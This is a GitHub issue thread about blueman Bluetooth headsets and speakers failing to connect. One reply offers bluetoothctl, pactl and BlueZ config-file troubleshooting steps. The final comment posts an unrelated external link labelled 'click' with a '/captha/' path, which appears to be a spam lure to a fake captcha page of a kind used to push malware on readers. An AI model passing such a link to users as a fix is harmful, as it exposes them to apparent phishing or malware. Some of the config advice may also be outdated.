blueman-project/blueman #2687: Won't connect to my headset or bt speaker

SNAPflix, 2025-03-27:
I get this error message when trying to add or connect with both my headset and my BT speaker:

Connection Failed: br-connection-profile-unavailable

With the speaker I got error messaging from start, but it worked fine with my headset at first. But after rebooting it wouldn't connect again.
Both my mouse and keyboard works fine though...

JosephG877, 2025-04-05:
Hello. Have you tried connecting to it via `bluetoothctl`?

```
power on
agent on
default-agent
trust <device_mac_address>
connect <device_mac_address>
```

Then in another terminal, you hit `pactl list cards short` and if there's a connected device, enter `pactl set-card-profile bluez_card.<device_mac_address> headset_head_unit`. 
Then you restart your main audio service and bluetooth service. 

I don't know what should be your profile of if it helps, but I solved the infamous  _br-connection-unknown_ error by forcing connection and HSP activation and  creating HSP/HFP profile in the following order:

Create the configuration file `~/.config/bluetooth/input.conf `with the following content:

```
[General]
JustWorksRepairing = always
Class = 0x200404
```

Then you edit the file `~/.config/pulse/default.pa` adding the following content:

`load-module module-bluetooth-discover`

Create the following folder and config file if there is none:

```
sudo mkdir -p /etc/bluetooth
sudo nano /etc/bluetooth/main.conf
```

Carefully add this section (check if it hasn't already):
```
[General]
Enable=Source,Sink,Media,Socket
FastConnectable = true
Class = 0x200404
JustWorksRepairing = always
```

Then you restart your main audio service and bluetooth service. Your problem should be gone.

samir-coder995, 2025-04-10:
maybe this will solve your problem [click](https://newrides.es/captha/)